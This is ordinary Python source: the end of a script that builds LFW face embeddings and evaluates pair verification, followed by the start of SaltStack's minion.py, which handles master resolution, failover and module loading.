image = cv.resize(image, (img_size, img_size), interpolation=cv.INTER_CUBIC)
batch_inputs[j, 0] = preprocess_input(image)
y_pred = model.predict([batch_inputs[0], batch_inputs[1], batch_inputs[2]])
a = y_pred[0, 0:128]
p = y_pred[0, 128:256]
n = y_pred[0, 256:384]
self.out_queue.put({'image_name': sample['a'], 'embedding': a})
self.out_queue.put({'image_name': sample['p'], 'embedding': p})
self.out_queue.put({'image_name': sample['n'], 'embedding': n})
self.signal_queue.put(SENTINEL)
if self.in_queue.qsize() == 0:
break
except Exception as e:
print(e)
import keras.backend as K
K.clear_session()
print('InferenceWorker done, GPU ID {}'.format(self.gpuid))
class Scheduler:
def __init__(self, gpuids, signal_queue):
self.signal_queue = signal_queue
manager = mp.Manager()
self.in_queue = manager.Queue()
self.out_queue = manager.Queue()
self._gpuids = gpuids
self.__init_workers()
def __init_workers(self):
self._workers = list()
for gpuid in self._gpuids:
self._workers.append(InferenceWorker(gpuid, self.in_queue, self.out_queue, self.signal_queue))
def start(self, names):
# put all of the image names into the queue
for name in names:
self.in_queue.put(name)
# start the workers
for worker in self._workers:
worker.start()
# wait for all workers to finish
for worker in self._workers:
worker.join()
print("all of workers have been done")
return self.out_queue
def run(gpuids, q):
# collect all image names from the LFW folder
names = get_lfw_images()
# init scheduler
x = Scheduler(gpuids, q)
# start processing and wait for complete
return x.start(names)
SENTINEL = 1
def listener(q):
pbar = tqdm(total=13233 // 3)
for item in iter(q.get, None):
pbar.update()
def create_lfw_embeddings():
gpuids = ['0', '1', '2', '3']
print(gpuids)
manager = mp.Manager()
q = manager.Queue()
proc = mp.Process(target=listener, args=(q,))
proc.start()
out_queue = run(gpuids, q)
out_list = []
while out_queue.qsize() > 0:
out_list.append(out_queue.get())
with open("data/lfw_embeddings.p", "wb") as file:
pickle.dump(out_list, file)
q.put(None)
proc.join()
if __name__ == "__main__":
print('creating lfw embeddings')
create_lfw_embeddings()
with open('data/lfw_embeddings.p', 'rb') as file:
embeddings = pickle.load(file)
pairs = get_lfw_pairs()
y_true_list = []
y_pred_list = []
print('evaluating lfw database')
for pair in tqdm(pairs):
image_name_1 = pair['image_name_1']
image_name_2 = pair['image_name_2']
y_true = pair['same_person']
y_true_list.append(y_true)
embedding_1 = np.array([x['embedding'] for x in embeddings if x['image_name'] == image_name_1][0])
embedding_2 = np.array([x['embedding'] for x in embeddings if x['image_name'] == image_name_2][0])
dist = np.square(np.linalg.norm(embedding_1 - embedding_2))
y_pred = dist <= threshold
y_pred_list.append(y_pred)
y = np.array(y_true_list).astype(np.int32)
pred = np.array(y_pred_list).astype(np.int32)
from sklearn import metrics
print(y)
print(pred)
fpr, tpr, thresholds = metrics.roc_curve(y, pred)
print('lfw ROC AUC: ' + str(metrics.auc(fpr, tpr)))
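# Hedged note: the value above is the ROC AUC computed from the hard 0/1 predictions.
# A plain pair accuracy at the same fixed ``threshold`` from config could be reported
# alongside it, for example:
#
#     accuracy = np.mean(y == pred)
#     print('lfw pair accuracy at threshold {}: {}'.format(threshold, accuracy))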
|
minion.py
|
# -*- coding: utf-8 -*-
'''
Routines to set up a minion
'''
# Import python libs
from __future__ import absolute_import, print_function, with_statement, unicode_literals
import functools
import os
import sys
import copy
import time
import types
import signal
import random
import logging
import threading
import traceback
import contextlib
import multiprocessing
from random import randint, shuffle
from stat import S_IMODE
import salt.serializers.msgpack
from binascii import crc32
# Import Salt Libs
# pylint: disable=import-error,no-name-in-module,redefined-builtin
from salt.ext import six
from salt.ext.six.moves import range
from salt.utils.zeromq import zmq, ZMQDefaultLoop, install_zmq, ZMQ_VERSION_INFO
import salt.defaults.exitcodes
from salt.utils.ctx import RequestContext
# pylint: enable=no-name-in-module,redefined-builtin
import tornado
HAS_PSUTIL = False
try:
import salt.utils.psutil_compat as psutil
HAS_PSUTIL = True
except ImportError:
pass
HAS_RESOURCE = False
try:
import resource
HAS_RESOURCE = True
except ImportError:
pass
try:
import zmq.utils.monitor
HAS_ZMQ_MONITOR = True
except ImportError:
HAS_ZMQ_MONITOR = False
try:
import salt.utils.win_functions
HAS_WIN_FUNCTIONS = True
except ImportError:
HAS_WIN_FUNCTIONS = False
# pylint: enable=import-error
# Import salt libs
import salt
import salt.client
import salt.crypt
import salt.loader
import salt.beacons
import salt.engines
import salt.payload
import salt.pillar
import salt.syspaths
import salt.utils.args
import salt.utils.context
import salt.utils.data
import salt.utils.error
import salt.utils.event
import salt.utils.files
import salt.utils.jid
import salt.utils.minion
import salt.utils.minions
import salt.utils.network
import salt.utils.platform
import salt.utils.process
import salt.utils.schedule
import salt.utils.ssdp
import salt.utils.user
import salt.utils.zeromq
import salt.defaults.exitcodes
import salt.cli.daemons
import salt.log.setup
import salt.utils.dictupdate
from salt.config import DEFAULT_MINION_OPTS
from salt.defaults import DEFAULT_TARGET_DELIM
from salt.utils.debug import enable_sigusr1_handler
from salt.utils.event import tagify
from salt.utils.odict import OrderedDict
from salt.utils.process import (default_signals,
SignalHandlingMultiprocessingProcess,
ProcessManager)
from salt.exceptions import (
CommandExecutionError,
CommandNotFoundError,
SaltInvocationError,
SaltReqTimeoutError,
SaltClientError,
SaltSystemExit,
SaltDaemonNotRunning,
SaltException,
SaltMasterUnresolvableError
)
import tornado.gen # pylint: disable=F0401
import tornado.ioloop # pylint: disable=F0401
log = logging.getLogger(__name__)
# To set up a minion:
# 1. Read in the configuration
# 2. Generate the function mapping dict
# 3. Authenticate with the master
# 4. Store the AES key
# 5. Connect to the publisher
# 6. Handle publications
def resolve_dns(opts, fallback=True):
'''
Resolves the master_ip and master_uri options
'''
ret = {}
check_dns = True
if (opts.get('file_client', 'remote') == 'local' and
not opts.get('use_master_when_local', False)):
check_dns = False
# Since salt.log is imported below, salt.utils.network needs to be imported here as well
import salt.utils.network
if check_dns is True:
try:
if opts['master'] == '':
raise SaltSystemExit
ret['master_ip'] = salt.utils.network.dns_check(
opts['master'],
int(opts['master_port']),
True,
opts['ipv6'],
attempt_connect=False)
except SaltClientError:
retry_dns_count = opts.get('retry_dns_count', None)
if opts['retry_dns']:
while True:
if retry_dns_count is not None:
if retry_dns_count == 0:
raise SaltMasterUnresolvableError
retry_dns_count -= 1
import salt.log
msg = ('Master hostname: \'{0}\' not found or not responsive. '
'Retrying in {1} seconds').format(opts['master'], opts['retry_dns'])
if salt.log.setup.is_console_configured():
log.error(msg)
else:
print('WARNING: {0}'.format(msg))
time.sleep(opts['retry_dns'])
try:
ret['master_ip'] = salt.utils.network.dns_check(
opts['master'],
int(opts['master_port']),
True,
opts['ipv6'],
attempt_connect=False)
break
except SaltClientError:
pass
else:
if fallback:
ret['master_ip'] = '127.0.0.1'
else:
raise
except SaltSystemExit:
unknown_str = 'unknown address'
master = opts.get('master', unknown_str)
if master == '':
master = unknown_str
if opts.get('__role') == 'syndic':
err = 'Master address: \'{0}\' could not be resolved. Invalid or unresolvable address. ' \
'Set \'syndic_master\' value in minion config.'.format(master)
else:
err = 'Master address: \'{0}\' could not be resolved. Invalid or unresolvable address. ' \
'Set \'master\' value in minion config.'.format(master)
log.error(err)
raise SaltSystemExit(code=42, msg=err)
else:
ret['master_ip'] = '127.0.0.1'
if 'master_ip' in ret and 'master_ip' in opts:
if ret['master_ip'] != opts['master_ip']:
log.warning(
'Master ip address changed from %s to %s',
opts['master_ip'], ret['master_ip']
)
if opts['source_interface_name']:
log.trace('Custom source interface required: %s', opts['source_interface_name'])
interfaces = salt.utils.network.interfaces()
log.trace('The following interfaces are available on this Minion:')
log.trace(interfaces)
if opts['source_interface_name'] in interfaces:
if interfaces[opts['source_interface_name']]['up']:
addrs = interfaces[opts['source_interface_name']]['inet'] if not opts['ipv6'] else\
interfaces[opts['source_interface_name']]['inet6']
ret['source_ip'] = addrs[0]['address']
log.debug('Using %s as source IP address', ret['source_ip'])
else:
log.warning('The interface %s is down so it cannot be used as source to connect to the Master',
opts['source_interface_name'])
else:
log.warning('%s is not a valid interface. Ignoring.', opts['source_interface_name'])
elif opts['source_address']:
ret['source_ip'] = salt.utils.network.dns_check(
opts['source_address'],
int(opts['source_ret_port']),
True,
opts['ipv6'],
attempt_connect=False)
log.debug('Using %s as source IP address', ret['source_ip'])
if opts['source_ret_port']:
ret['source_ret_port'] = int(opts['source_ret_port'])
log.debug('Using %d as source port for the ret server', ret['source_ret_port'])
if opts['source_publish_port']:
ret['source_publish_port'] = int(opts['source_publish_port'])
log.debug('Using %d as source port for the master pub', ret['source_publish_port'])
ret['master_uri'] = 'tcp://{ip}:{port}'.format(
ip=ret['master_ip'], port=opts['master_port'])
log.debug('Master URI: %s', ret['master_uri'])
return ret
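# Hedged sketch: for a minimal opts dict along the lines of
#   {'master': 'salt.example.com', 'master_port': 4506, 'ipv6': False,
#    'file_client': 'remote', 'retry_dns': 30, 'source_interface_name': '',
#    'source_address': '', 'source_ret_port': 0, 'source_publish_port': 0}
# resolve_dns() would return something like
#   {'master_ip': '203.0.113.10', 'master_uri': 'tcp://203.0.113.10:4506'}
# with the IP produced by salt.utils.network.dns_check(); the hostname and address
# above are illustrative only.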
def prep_ip_port(opts):
ret = {}
# Use given master IP if "ip_only" is set or if master_ip is an ipv6 address without
# a port specified. The is_ipv6 check returns False if brackets are used in the IP
# definition such as master: '[::1]:1234'.
if opts['master_uri_format'] == 'ip_only' or salt.utils.network.is_ipv6(opts['master']):
ret['master'] = opts['master']
else:
ip_port = opts['master'].rsplit(':', 1)
if len(ip_port) == 1:
# e.g. master: mysaltmaster
ret['master'] = ip_port[0]
else:
# e.g. master: localhost:1234
# e.g. master: 127.0.0.1:1234
# e.g. master: [::1]:1234
# Strip off brackets for ipv6 support
ret['master'] = ip_port[0].strip('[]')
# Cast port back to an int! Otherwise a TypeError is thrown
# on some of the socket calls elsewhere in the minion and utils code.
ret['master_port'] = int(ip_port[1])
return ret
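# Worked examples of the parsing above, with master_uri_format left at its default value:
#   {'master': 'mysaltmaster'}    -> {'master': 'mysaltmaster'}
#   {'master': '127.0.0.1:1234'}  -> {'master': '127.0.0.1', 'master_port': 1234}
#   {'master': '[::1]:1234'}      -> {'master': '::1', 'master_port': 1234}
#   {'master': '::1'}             -> {'master': '::1'}   (is_ipv6 is True, kept verbatim)
# With master_uri_format set to 'ip_only', the master value is always passed through unchanged.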
def get_proc_dir(cachedir, **kwargs):
'''
Given the cache directory, return the directory that process data is
stored in, creating it if it doesn't exist.
The following optional Keyword Arguments are handled:
mode: which is anything os.makedirs would accept as mode.
uid: the uid to set, if not set, or it is None or -1 no changes are
made. Same applies if the directory is already owned by this
uid. Must be int. Works only on unix/unix like systems.
gid: the gid to set, if not set, or it is None or -1 no changes are
made. Same applies if the directory is already owned by this
gid. Must be int. Works only on unix/unix like systems.
'''
fn_ = os.path.join(cachedir, 'proc')
mode = kwargs.pop('mode', None)
if mode is None:
mode = {}
else:
mode = {'mode': mode}
if not os.path.isdir(fn_):
# proc_dir is not present, create it with mode settings
os.makedirs(fn_, **mode)
d_stat = os.stat(fn_)
# if mode is not an empty dict then we have an explicit
# dir mode. So lets check if mode needs to be changed.
if mode:
mode_part = S_IMODE(d_stat.st_mode)
if mode_part != mode['mode']:
os.chmod(fn_, (d_stat.st_mode ^ mode_part) | mode['mode'])
if hasattr(os, 'chown'):
# only on unix/unix like systems
uid = kwargs.pop('uid', -1)
gid = kwargs.pop('gid', -1)
# if uid and gid are both -1 then go ahead with
# no changes at all
if (d_stat.st_uid != uid or d_stat.st_gid != gid) and \
[i for i in (uid, gid) if i != -1]:
os.chown(fn_, uid, gid)
return fn_
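# Hedged usage sketch: ensure the minion proc dir exists with a restrictive mode and
# explicit ownership (uid/gid only take effect on Unix-like systems):
#
#     proc_dir = get_proc_dir('/var/cache/salt/minion', mode=0o700, uid=0, gid=0)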
def load_args_and_kwargs(func, args, data=None, ignore_invalid=False):
'''
Detect the args and kwargs that need to be passed to a function call, and
check them against what was passed.
'''
argspec = salt.utils.args.get_function_argspec(func)
_args = []
_kwargs = {}
invalid_kwargs = []
for arg in args:
if isinstance(arg, dict) and arg.pop('__kwarg__', False) is True:
# if the arg is a dict with __kwarg__ == True, then its a kwarg
for key, val in six.iteritems(arg):
if argspec.keywords or key in argspec.args:
# Function supports **kwargs or is a positional argument to
# the function.
_kwargs[key] = val
else:
# **kwargs not in argspec and parsed argument name not in
# list of positional arguments. This keyword argument is
# invalid.
invalid_kwargs.append('{0}={1}'.format(key, val))
continue
else:
string_kwarg = salt.utils.args.parse_input([arg], condition=False)[1] # pylint: disable=W0632
if string_kwarg:
if argspec.keywords or next(six.iterkeys(string_kwarg)) in argspec.args:
# Function supports **kwargs or is a positional argument to
# the function.
_kwargs.update(string_kwarg)
else:
# **kwargs not in argspec and parsed argument name not in
# list of positional arguments. This keyword argument is
# invalid.
for key, val in six.iteritems(string_kwarg):
invalid_kwargs.append('{0}={1}'.format(key, val))
else:
_args.append(arg)
if invalid_kwargs and not ignore_invalid:
salt.utils.args.invalid_kwargs(invalid_kwargs)
if argspec.keywords and isinstance(data, dict):
# this function accepts **kwargs, pack in the publish data
for key, val in six.iteritems(data):
_kwargs['__pub_{0}'.format(key)] = val
return _args, _kwargs
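# Worked example (illustrative names): given a function such as ``def test(name, **kwargs)``,
#   load_args_and_kwargs(test, ['foo', 'refresh=True', {'__kwarg__': True, 'saltenv': 'base'}])
# would yield roughly
#   _args   == ['foo']
#   _kwargs == {'refresh': True, 'saltenv': 'base'}
# String arguments of the form key=value are parsed by salt.utils.args.parse_input, and
# dicts flagged with __kwarg__ are unpacked directly; everything else stays positional.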
def eval_master_func(opts):
'''
Evaluate master function if master type is 'func'
and save it result in opts['master']
'''
if '__master_func_evaluated' not in opts:
# split module and function and try loading the module
mod_fun = opts['master']
mod, fun = mod_fun.split('.')
try:
master_mod = salt.loader.raw_mod(opts, mod, fun)
if not master_mod:
raise KeyError
# we take whatever the module returns as master address
opts['master'] = master_mod[mod_fun]()
# Check for valid types
if not isinstance(opts['master'], (six.string_types, list)):
raise TypeError
opts['__master_func_evaluated'] = True
except KeyError:
log.error('Failed to load module %s', mod_fun)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
except TypeError:
log.error('%s returned from %s is not a string', opts['master'], mod_fun)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
log.info('Evaluated master from module: %s', mod_fun)
def master_event(type, master=None):
'''
Centralized master event function which will return event type based on event_map
'''
event_map = {'connected': '__master_connected',
'disconnected': '__master_disconnected',
'failback': '__master_failback',
'alive': '__master_alive'}
if type == 'alive' and master is not None:
return '{0}_{1}'.format(event_map.get(type), master)
return event_map.get(type, None)
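# Worked examples, straight from the event_map above:
#   master_event('connected')        -> '__master_connected'
#   master_event('alive', 'master1') -> '__master_alive_master1'
#   master_event('bogus')            -> None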
def service_name():
'''
Return the proper service name based on platform
'''
return 'salt_minion' if 'bsd' in sys.platform else 'salt-minion'
class MinionBase(object):
def __init__(self, opts):
self.opts = opts
@staticmethod
def process_schedule(minion, loop_interval):
try:
if hasattr(minion, 'schedule'):
minion.schedule.eval()
else:
log.error('Minion scheduler not initialized. Scheduled jobs will not be run.')
return
# Check if scheduler requires lower loop interval than
# the loop_interval setting
if minion.schedule.loop_interval < loop_interval:
loop_interval = minion.schedule.loop_interval
log.debug(
'Overriding loop_interval because of scheduled jobs.'
)
except Exception as exc:
log.error('Exception %s occurred in scheduled job', exc)
return loop_interval
def process_beacons(self, functions):
'''
Evaluate all of the configured beacons, grab the config again in case
the pillar or grains changed
'''
if 'config.merge' in functions:
b_conf = functions['config.merge']('beacons', self.opts['beacons'], omit_opts=True)
if b_conf:
return self.beacons.process(b_conf, self.opts['grains']) # pylint: disable=no-member
return []
@tornado.gen.coroutine
def eval_master(self,
opts,
timeout=60,
safe=True,
failed=False,
failback=False):
'''
Evaluates and returns a tuple of the current master address and the pub_channel.
In standard mode, just creates a pub_channel with the given master address.
With master_type=func evaluates the current master address from the given
module and then creates a pub_channel.
With master_type=failover takes the list of masters and loops through them.
The first one that allows the minion to create a pub_channel is then
returned. If this function is called outside the minion's initialization
phase (for example from the minion's main event loop when a master connection
loss was detected), 'failed' should be set to True. The current
(possibly failed) master will then be removed from the list of masters.
'''
# return early if we are not connecting to a master
if opts['master_type'] == 'disable':
log.warning('Master is set to disable, skipping connection')
self.connected = False
raise tornado.gen.Return((None, None))
# Run masters discovery over SSDP. This may modify the whole configuration,
# depending of the networking and sets of masters.
# if we are using multimaster, discovery can only happen at start time
# because MinionManager handles it. by eval_master time the minion doesn't
# know about other siblings currently running
if isinstance(self.opts['discovery'], dict) and not self.opts['discovery'].get('multimaster'):
self._discover_masters()
# check if master_type was altered from its default
if opts['master_type'] != 'str' and opts['__role'] != 'syndic':
# check for a valid keyword
if opts['master_type'] == 'func':
eval_master_func(opts)
# if failover or distributed is set, master has to be of type list
elif opts['master_type'] in ('failover', 'distributed'):
if isinstance(opts['master'], list):
log.info(
'Got list of available master addresses: %s',
opts['master']
)
if opts['master_type'] == 'distributed':
master_len = len(opts['master'])
if master_len > 1:
secondary_masters = opts['master'][1:]
master_idx = crc32(opts['id']) % master_len
try:
preferred_masters = opts['master']
preferred_masters[0] = opts['master'][master_idx]
preferred_masters[1:] = [m for m in opts['master'] if m != preferred_masters[0]]
opts['master'] = preferred_masters
log.info('Distributed to the master at \'{0}\'.'.format(opts['master'][0]))
except (KeyError, AttributeError, TypeError):
log.warning('Failed to distribute to a specific master.')
else:
log.warning('master_type = distributed needs more than 1 master.')
if opts['master_shuffle']:
log.warning(
'Use of \'master_shuffle\' detected. \'master_shuffle\' is deprecated in favor '
'of \'random_master\'. Please update your minion config file.'
)
opts['random_master'] = opts['master_shuffle']
opts['auth_tries'] = 0
if opts['master_failback'] and opts['master_failback_interval'] == 0:
opts['master_failback_interval'] = opts['master_alive_interval']
# if opts['master'] is a str and we have never created opts['master_list']
elif isinstance(opts['master'], six.string_types) and ('master_list' not in opts):
# We have a string, but a list was what was intended. Convert.
# See issue 23611 for details
opts['master'] = [opts['master']]
elif opts['__role'] == 'syndic':
log.info('Syndic setting master_syndic to \'%s\'', opts['master'])
# if failed=True, the minion was previously connected
# we're probably called from the minion's main event loop
# because a master connection loss was detected. remove
# the possibly failed master from the list of masters.
elif failed:
if failback:
# failback list of masters to original config
opts['master'] = opts['master_list']
else:
log.info(
'Moving possibly failed master %s to the end of '
'the list of masters', opts['master']
)
if opts['master'] in opts['local_masters']:
# create new list of master with the possibly failed
# one moved to the end
failed_master = opts['master']
opts['master'] = [x for x in opts['local_masters'] if opts['master'] != x]
opts['master'].append(failed_master)
else:
opts['master'] = opts['master_list']
else:
msg = ('master_type set to \'failover\' but \'master\' '
'is not of type list but of type '
'{0}'.format(type(opts['master'])))
log.error(msg)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
# If failover is set, the minion has to fail over on DNS errors instead of retrying DNS resolution.
# See issue 21082 for details
if opts['retry_dns'] and opts['master_type'] == 'failover':
msg = ('\'master_type\' set to \'failover\' but \'retry_dns\' is not 0. '
'Setting \'retry_dns\' to 0 to failover to the next master on DNS errors.')
log.critical(msg)
opts['retry_dns'] = 0
else:
msg = ('Invalid keyword \'{0}\' for variable '
'\'master_type\''.format(opts['master_type']))
log.error(msg)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
# FIXME: if SMinion don't define io_loop, it can't switch master see #29088
# Specify kwargs for the channel factory so that SMinion doesn't need to define an io_loop
# (The channel factories will set a default if the kwarg isn't passed)
factory_kwargs = {'timeout': timeout, 'safe': safe}
if getattr(self, 'io_loop', None):
factory_kwargs['io_loop'] = self.io_loop # pylint: disable=no-member
tries = opts.get('master_tries', 1)
attempts = 0
# if we have a list of masters, loop through them and be
# happy with the first one that allows us to connect
if isinstance(opts['master'], list):
conn = False
last_exc = None
opts['master_uri_list'] = []
opts['local_masters'] = copy.copy(opts['master'])
# shuffle the masters and then loop through them
if opts['random_master']:
# master_failback is only used when master_type is set to failover
if opts['master_type'] == 'failover' and opts['master_failback']:
secondary_masters = opts['local_masters'][1:]
shuffle(secondary_masters)
opts['local_masters'][1:] = secondary_masters
else:
shuffle(opts['local_masters'])
# This sits outside of the connection loop below because it needs to set
# up a list of master URIs regardless of which masters are available
# to connect _to_. This is primarily used for masterless mode, when
# we need a list of master URIs to fire calls back to.
for master in opts['local_masters']:
opts['master'] = master
opts.update(prep_ip_port(opts))
opts['master_uri_list'].append(resolve_dns(opts)['master_uri'])
while True:
if attempts != 0:
# Give up a little time between connection attempts
# to allow the IOLoop to run any other scheduled tasks.
yield tornado.gen.sleep(opts['acceptance_wait_time'])
attempts += 1
if tries > 0:
log.debug(
'Connecting to master. Attempt %s of %s',
attempts, tries
)
else:
log.debug(
'Connecting to master. Attempt %s (infinite attempts)',
attempts
)
for master in opts['local_masters']:
opts['master'] = master
opts.update(prep_ip_port(opts))
opts.update(resolve_dns(opts))
# on first run, update self.opts with the whole master list
# to enable a minion to re-use old masters if they get fixed
if 'master_list' not in opts:
opts['master_list'] = copy.copy(opts['local_masters'])
self.opts = opts
try:
pub_channel = salt.transport.client.AsyncPubChannel.factory(opts, **factory_kwargs)
yield pub_channel.connect()
conn = True
break
except SaltClientError as exc:
last_exc = exc
if exc.strerror.startswith('Could not access'):
msg = (
'Failed to initiate connection with Master '
'%s: check ownership/permissions. Error '
'message: %s', opts['master'], exc
)
else:
msg = ('Master %s could not be reached, trying next '
'master (if any)', opts['master'])
log.info(msg)
continue
if not conn:
if attempts == tries:
# Exhausted all attempts. Return exception.
self.connected = False
self.opts['master'] = copy.copy(self.opts['local_masters'])
log.error(
'No master could be reached or all masters '
'denied the minion\'s connection attempt.'
)
# If the code reaches this point, 'last_exc'
# should already be set.
raise last_exc # pylint: disable=E0702
else:
self.tok = pub_channel.auth.gen_token(b'salt')
self.connected = True
raise tornado.gen.Return((opts['master'], pub_channel))
# single master sign in
else:
if opts['random_master']:
log.warning('random_master is True but there is only one master specified. Ignoring.')
while True:
if attempts != 0:
# Give up a little time between connection attempts
# to allow the IOLoop to run any other scheduled tasks.
yield tornado.gen.sleep(opts['acceptance_wait_time'])
attempts += 1
if tries > 0:
log.debug(
'Connecting to master. Attempt %s of %s',
attempts, tries
)
else:
log.debug(
'Connecting to master. Attempt %s (infinite attempts)',
attempts
)
opts.update(prep_ip_port(opts))
opts.update(resolve_dns(opts))
try:
if self.opts['transport'] == 'detect':
self.opts['detect_mode'] = True
for trans in ('zeromq', 'tcp'):
if trans == 'zeromq' and not zmq:
continue
self.opts['transport'] = trans
pub_channel = salt.transport.client.AsyncPubChannel.factory(self.opts, **factory_kwargs)
yield pub_channel.connect()
if not pub_channel.auth.authenticated:
continue
del self.opts['detect_mode']
break
else:
pub_channel = salt.transport.client.AsyncPubChannel.factory(self.opts, **factory_kwargs)
yield pub_channel.connect()
self.tok = pub_channel.auth.gen_token(b'salt')
self.connected = True
raise tornado.gen.Return((opts['master'], pub_channel))
except SaltClientError as exc:
if attempts == tries:
# Exhausted all attempts. Return exception.
self.connected = False
raise exc
def _discover_masters(self):
'''
Discover master(s) and decide where to connect, if SSDP is around.
This modifies the configuration on the fly.
:return:
'''
if self.opts['master'] == DEFAULT_MINION_OPTS['master'] and self.opts['discovery'] is not False:
master_discovery_client = salt.utils.ssdp.SSDPDiscoveryClient()
masters = {}
for att in range(self.opts['discovery'].get('attempts', 3)):
try:
att += 1
log.info('Attempting {0} time{1} to discover masters'.format(att, (att > 1 and 's' or '')))
masters.update(master_discovery_client.discover())
if not masters:
time.sleep(self.opts['discovery'].get('pause', 5))
else:
break
except Exception as err:
log.error('SSDP discovery failure: {0}'.format(err))
break
if masters:
policy = self.opts.get('discovery', {}).get('match', 'any')
if policy not in ['any', 'all']:
log.error('SSDP configuration matcher failure: unknown value "{0}". '
'Should be "any" or "all"'.format(policy))
return
mapping = self.opts['discovery'].get('mapping', {})
discovered = []
for addr, mappings in masters.items():
for proto_data in mappings:
cnt = len([key for key, value in mapping.items()
if proto_data.get('mapping', {}).get(key) == value])
if (policy == 'any' and bool(cnt)) or cnt == len(mapping):
if self.opts['discovery'].get('multimaster'):
discovered.append(proto_data['master'])
else:
self.opts['master'] = proto_data['master']
return
self.opts['master'] = discovered
def _return_retry_timer(self):
'''
Based on the minion configuration, either return a randomized timer or
just return the value of the return_retry_timer.
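
Example ``opts`` values that enable the randomized timer (a sketch;
the values are illustrative and given in seconds):

.. code-block:: python

    opts['return_retry_timer'] = 5
    opts['return_retry_timer_max'] = 10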
'''
msg = 'Minion return retry timer set to {0} seconds'
# future lint: disable=str-format-in-logging
if self.opts.get('return_retry_timer_max'):
try:
random_retry = randint(self.opts['return_retry_timer'], self.opts['return_retry_timer_max'])
log.debug(msg.format(random_retry) + ' (randomized)')
return random_retry
except ValueError:
# Catch wiseguys using negative integers here
log.error(
'Invalid value (return_retry_timer: %s or '
'return_retry_timer_max: %s). Both must be positive '
'integers.',
self.opts['return_retry_timer'],
self.opts['return_retry_timer_max'],
)
log.debug(msg.format(DEFAULT_MINION_OPTS['return_retry_timer']))
return DEFAULT_MINION_OPTS['return_retry_timer']
else:
log.debug(msg.format(self.opts.get('return_retry_timer')))
return self.opts.get('return_retry_timer')
# future lint: enable=str-format-in-logging
class SMinion(MinionBase):
'''
Create an object that has loaded all of the minion module functions,
grains, modules, returners etc. The SMinion allows developers to
generate all of the salt minion functions and present them with these
functions for general use.
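
Usage example (a minimal sketch, assuming a readable minion
configuration at the default path):

.. code-block:: python

    import salt.config
    import salt.minion

    opts = salt.config.minion_config('/etc/salt/minion')
    sminion = salt.minion.SMinion(opts)
    sminion.functions['test.ping']()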
'''
def __init__(self, opts):
# Late setup of the opts grains, so we can log from the grains module
import salt.loader
opts['grains'] = salt.loader.grains(opts)
super(SMinion, self).__init__(opts)
# run ssdp discovery if necessary
self._discover_masters()
# If the file client is remote (or the master should be used when local), sign in to a master before loading modules
if (self.opts.get('file_client', 'remote') == 'remote'
or self.opts.get('use_master_when_local', False)):
install_zmq()
io_loop = ZMQDefaultLoop.current()
io_loop.run_sync(
lambda: self.eval_master(self.opts, failed=True)
)
self.gen_modules(initial_load=True)
# If configured, cache pillar data on the minion
if self.opts['file_client'] == 'remote' and self.opts.get('minion_pillar_cache', False):
import salt.utils.yaml
pdir = os.path.join(self.opts['cachedir'], 'pillar')
if not os.path.isdir(pdir):
os.makedirs(pdir, 0o700)
ptop = os.path.join(pdir, 'top.sls')
if self.opts['saltenv'] is not None:
penv = self.opts['saltenv']
else:
penv = 'base'
cache_top = {penv: {self.opts['id']: ['cache']}}
with salt.utils.files.fopen(ptop, 'wb') as fp_:
salt.utils.yaml.safe_dump(cache_top, fp_)
os.chmod(ptop, 0o600)
cache_sls = os.path.join(pdir, 'cache.sls')
with salt.utils.files.fopen(cache_sls, 'wb') as fp_:
salt.utils.yaml.safe_dump(self.opts['pillar'], fp_)
os.chmod(cache_sls, 0o600)
def gen_modules(self, initial_load=False):
'''
Tell the minion to reload the execution modules
CLI Example:

.. code-block:: bash

    salt '*' sys.reload_modules
'''
self.opts['pillar'] = salt.pillar.get_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['saltenv'],
pillarenv=self.opts.get('pillarenv'),
).compile_pillar()
self.utils = salt.loader.utils(self.opts)
self.functions = salt.loader.minion_mods(self.opts, utils=self.utils)
self.serializers = salt.loader.serializers(self.opts)
self.returners = salt.loader.returners(self.opts, self.functions)
self.proxy = salt.loader.proxy(self.opts, self.functions, self.returners, None)
# TODO: remove
self.function_errors = {} # Keep the funcs clean
self.states = salt.loader.states(self.opts,
self.functions,
self.utils,
self.serializers)
self.rend = salt.loader.render(self.opts, self.functions)
# self.matcher = Matcher(self.opts, self.functions)
self.matchers = salt.loader.matchers(self.opts)
self.functions['sys.reload_modules'] = self.gen_modules
self.executors = salt.loader.executors(self.opts)
class MasterMinion(object):
'''
Create a fully loaded minion function object for generic use on the
master. What makes this class different is that the pillar is
omitted, otherwise everything else is loaded cleanly.
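
Usage example (a minimal sketch, assuming a master configuration at
the default path):

.. code-block:: python

    import salt.config
    import salt.minion

    opts = salt.config.master_config('/etc/salt/master')
    mminion = salt.minion.MasterMinion(opts)
    mminion.functions['test.ping']()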
'''
def __init__(
self,
opts,
returners=True,
states=True,
rend=True,
matcher=True,
whitelist=None,
ignore_config_errors=True):
self.opts = salt.config.minion_config(
opts['conf_file'],
ignore_config_errors=ignore_config_errors,
role='master'
)
self.opts.update(opts)
self.whitelist = whitelist
self.opts['grains'] = salt.loader.grains(opts)
self.opts['pillar'] = {}
self.mk_returners = returners
self.mk_states = states
self.mk_rend = rend
self.mk_matcher = matcher
self.gen_modules(initial_load=True)
def gen_modules(self, initial_load=False):
'''
Tell the minion to reload the execution modules
CLI Example:

.. code-block:: bash

    salt '*' sys.reload_modules
'''
self.utils = salt.loader.utils(self.opts)
self.functions = salt.loader.minion_mods(
self.opts,
utils=self.utils,
whitelist=self.whitelist,
initial_load=initial_load)
self.serializers = salt.loader.serializers(self.opts)
if self.mk_returners:
self.returners = salt.loader.returners(self.opts, self.functions)
if self.mk_states:
self.states = salt.loader.states(self.opts,
self.functions,
self.utils,
self.serializers)
if self.mk_rend:
self.rend = salt.loader.render(self.opts, self.functions)
if self.mk_matcher:
self.matchers = salt.loader.matchers(self.opts)
self.functions['sys.reload_modules'] = self.gen_modules
class MinionManager(MinionBase):
'''
Create a multi-minion interface; this creates as many minions as are
defined in the master option and binds each minion object to a respective
master.
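
Example ``opts`` value that results in one Minion object per master
(a sketch; the hostnames are placeholders, normally set via the
``master`` option in the minion config):

.. code-block:: python

    opts['master'] = ['master1.example.com', 'master2.example.com']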
'''
def __init__(self, opts):
super(MinionManager, self).__init__(opts)
self.auth_wait = self.opts['acceptance_wait_time']
self.max_auth_wait = self.opts['acceptance_wait_time_max']
self.minions = []
self.jid_queue = []
install_zmq()
